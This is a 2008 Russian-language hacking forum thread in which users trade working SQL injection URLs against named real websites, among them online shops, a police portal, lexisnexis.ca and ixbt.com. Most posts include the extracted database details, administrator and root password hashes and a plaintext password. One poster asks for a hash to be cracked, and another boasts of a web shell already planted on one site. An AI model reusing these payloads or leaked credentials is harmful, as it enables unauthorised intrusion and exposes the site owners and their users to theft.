
05.07.2008, 12:02
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
Сообщение от sabe
http://www.cesvot.it/usr_view.php/ID=-1%20union%20select%201,2,3,4,5,6,7--
я тут вообще инъекции не увидел
Сообщение от sabe
http://www.freewebtemplates.com/template.php?id=3&start=99999'
тут кстати тоже...
Последний раз редактировалось gisTy; 05.07.2008 в 12:14..
|
|
|

05.07.2008, 12:09
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
http://www.roviniete.ro/detalii_vignete_europa.php?id=1+union+select+1,con cat_ws(0x3a,user(),version(),database()),3+limit+1 ,1/*
Database Version: 5.0.45
Database name: rovini_roviniete
User name: rovini_usrrovi@localhost
admins :
dan:7c4014be271c668dffa7911537fc3203
rbd:8b6a8a4e9fd167ad9dfeabd502ebace3: makaveli
админку не нашел...
на морде есть логин для клиентов
http://www.santo-raphael.ro/product.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,concat_ws(0x3a,version(),user(),database()) ,14,15,16,17,18+limit+1,1/*
Database Version: 4.1.14
Database name: shop
User name: admin@localhost
tables
admin колонки которые подобрал не интересные: email,id, phone
mysql.user колонки pasword, user
admin:2ef439381b2bdf7b: galeon
usr_market:2ef439381b2bdf7b : galeon
админку не искал..на морде логин для клиентов
Последний раз редактировалось Gorev; 05.07.2008 в 12:36..
|
|
|

05.07.2008, 18:07
|
|
Познающий
Регистрация: 13.04.2008
Сообщений: 42
С нами:
9513970
Репутация:
35
|
|
www.02.ru - Правоохранительный портал
_http://www.02.ru/zakon/index.php?id_mz=15+union+select+1,concat_ws(0x3a,u ser(),version(),database()),3,4/*
USER: ru183180_02ru@localhost
VERSION: 4.0.27-log
DATABASE: ru183180_02rudb
Они даже себя засчищать не хотят 
|
|
|

05.07.2008, 18:42
|
|
Новичок
Регистрация: 19.08.2007
Сообщений: 18
С нами:
9856542
Репутация:
8
|
|
http://www.slamdunk.ro/stire.php?id=-400+union+select+1,2,3,4,5,6,7,8,9/*
http://www.ccimm.ro/search/show.php?id=-131'+union+select+1,2,3,4,5,6,concat_ws(char(58),u sername,password),8,9,0,1,2,3,4,5+from+user/*
|
|
|

05.07.2008, 23:40
|
|
Banned
Регистрация: 05.07.2008
Сообщений: 2
С нами:
9394946
Репутация:
2
|
|
http://www.lexisnexis.ca/bookstore/bookinfo.php?pid=-20+union+select+1,cast(version()+as+binary),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
|
|
|

06.07.2008, 21:38
|
|
Новичок
Регистрация: 21.08.2005
Сообщений: 3
С нами:
10905493
Репутация:
0
|
|
http://www.bankrollmob.com/forum.asp?mode=thread&id=-32278%20union%20select%20pwd,2%20from%20admin
Password: 75ea14129638ac5c2bd34c0a615dfe7f
Please crack for me password. Help me
|
|
|

06.07.2008, 00:13
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами:
9949072
Репутация:
237
|
|
Код:
http://www.vip-gsm.ru/spec.php?id=-573'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x2F,user,password),13,14,15,16,17,18+from+mysql.user/*
Version: 4.1.18
User/Pass: root/40cdfeb7631887f0
|
|
|

06.07.2008, 00:34
|
|
Banned
Регистрация: 05.07.2008
Сообщений: 2
С нами:
9394946
Репутация:
2
|
|
K1nD[e]R, на вип джи эс эм у меня уже давно шелл лежит, там file_priv =Y b кавычки не экранируются, в ошибке путь виден, папка на заливку sql/images вроде,
|
|
|

06.07.2008, 01:08
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами:
9949072
Репутация:
237
|
|
Код:
http://shirley.ru/cat.php?id=-3+union+select+concat_ws(0x2F,uid,uname,pass),2+from+shir_users+limit+3,3/*
Version: 5.0.33
uname/pass : Алексей/c6f057b86584942e415435ffb1fa93d4
P.S юзаем (limit+x,x) для вывода юзеров=)
|
|
|

06.07.2008, 01:39
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами:
9949072
Репутация:
237
|
|
Код:
http://www.ixbt.com/news/news.php?id=-1+union+select+1,2,concat_ws(0x2F,name,password),version(),5,6,7,8,9,10,11+from+user+limit+3,3/*
Version: 4.0.27
name/pass: Administrator/another_enter
P.S юзаем (limit+x,x) для вывода юзеров=)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|